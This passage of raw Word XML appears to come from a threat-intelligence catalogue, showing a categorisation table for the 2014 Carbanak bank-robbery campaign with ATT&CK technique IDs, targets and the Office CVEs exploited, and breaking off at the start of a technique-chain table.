      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FE46D" w14:textId="75C32C65" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00A561FA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc153480878"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:r w:rsidR="00A561FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002440E2">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002440E2">
        <w:t xml:space="preserve"> T1189, T1078 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00A561FA">
        <w:t>CARBANAK APT THE GREAT BANK ROBBERY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="585B01A3" w14:textId="6414B8C8" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Categorisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E44170" w14:textId="77777777" w:rsidR="00CA1C16" w:rsidRPr="00CA1C16" w:rsidRDefault="00CA1C16" w:rsidP="00CA1C16"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="002D1D50" w14:paraId="67EFFC47" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="365AB477" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="002D1D50" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="100" w:name="OLE_LINK10"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50CA026F" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="002D1D50" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CC47EB" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="00387DCC" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5FE0" w:rsidRPr="00B857D7" w14:paraId="7B309BCD" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48BAD22B" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="421D9336" w14:textId="469DA4BB" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03A5656C" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRPr="00387DCC" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="46BAF2A8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CAE1E02" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="007328DE" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC23A59" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="007328DE" w:rsidRDefault="007A1FAD" w:rsidP="00466243">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3C45397B" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="00387DCC" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="5DA43697" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CFC021B" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AE98EF0" w14:textId="0C72B1BE" w:rsidR="007A1FAD" w:rsidRPr="007328DE" w:rsidRDefault="007D01D9" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ukraine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1D71D1" w14:textId="2B55FAB7" w:rsidR="007A1FAD" w:rsidRPr="00387DCC" w:rsidRDefault="007D01D9" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TCERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="40851D03" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCF2C9F" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49EFD3EF" w14:textId="2AC2FB78" w:rsidR="007A1FAD" w:rsidRDefault="00626C16" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A2618D" w14:textId="675295CB" w:rsidR="007A1FAD" w:rsidRPr="00387DCC" w:rsidRDefault="00A93A1F" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="17D5CFA1" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DB6DE2C" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B760EE7" w14:textId="66959395" w:rsidR="007A1FAD" w:rsidRDefault="00626C16" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Banking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B26BAB6" w14:textId="7E82E7FD" w:rsidR="007A1FAD" w:rsidRPr="00387DCC" w:rsidRDefault="00A93A1F" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="059DACA9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008B228B" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B8D3CF" w14:textId="76FDF3AD" w:rsidR="007A1FAD" w:rsidRDefault="00626C16" w:rsidP="00626C16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Damage (integrity and availability), Reputation (external to the target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A29792" w14:textId="7AE284C9" w:rsidR="007A1FAD" w:rsidRDefault="00626C16" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Stolen money</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="443542C4" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF5832C" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B5F62B" w14:textId="42623737" w:rsidR="007A1FAD" w:rsidRDefault="00983C59" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00983C59">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="000110AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00983C59">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2012-0158</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00983C59">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2013-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00983C59">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3906</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00983C59">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00983C59">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>- 201</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4-1761</w:t>
            </w:r>
            <w:r w:rsidR="00E902D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00E902D8">
              <w:t>CVE-2013-3660</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E80715" w14:textId="77777777" w:rsidR="00137B83" w:rsidRPr="00137B83" w:rsidRDefault="00A93A1F" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidR="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00137B83" w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The email attachments exploit vulnerabilities in Microsoft Office 2003, 2007 and </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2064756A" w14:textId="77777777" w:rsidR="00137B83" w:rsidRPr="00137B83" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2010 (CVE-2012-0158 and CVE-2013-3906) and Microsoft Word (CVE-2014-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB19886" w14:textId="48F9339B" w:rsidR="007A1FAD" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1761)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="00356E65" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A4F3D3B" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CECED14" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="085000A5" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="39868F88" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED9F999" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B492557" w14:textId="5349A190" w:rsidR="00873778" w:rsidRDefault="00CA1C16" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="402A803E" w14:textId="39B88FF1" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="02DAE8EB" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3D3968" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D0454B" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65FF011F" w14:textId="7876E84A" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A1FAD" w:rsidRPr="00B857D7" w14:paraId="0E2B8706" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD8D1DD" w14:textId="7E5914E8" w:rsidR="007A1FAD" w:rsidRDefault="00873778" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44F7D577" w14:textId="0DB3F815" w:rsidR="007A1FAD" w:rsidRDefault="00626C16" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C517B6" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="00466243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="100"/>
    </w:tbl>
    <w:p w14:paraId="36E7A5DB" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="00AC7A85" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD"/>
    <w:p w14:paraId="6FD290A2" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C037B07" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="00223DC5" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10992" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="585"/>
        <w:gridCol w:w="1497"/>
        <w:gridCol w:w="2240"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="605"/>
        <w:gridCol w:w="1101"/>
        <w:gridCol w:w="1177"/>
        <w:gridCol w:w="3152"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="002D1D50" w14:paraId="016D4561" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2C93B634" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="101" w:name="OLE_LINK9"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="39C1A9B4" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="002D1D50" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
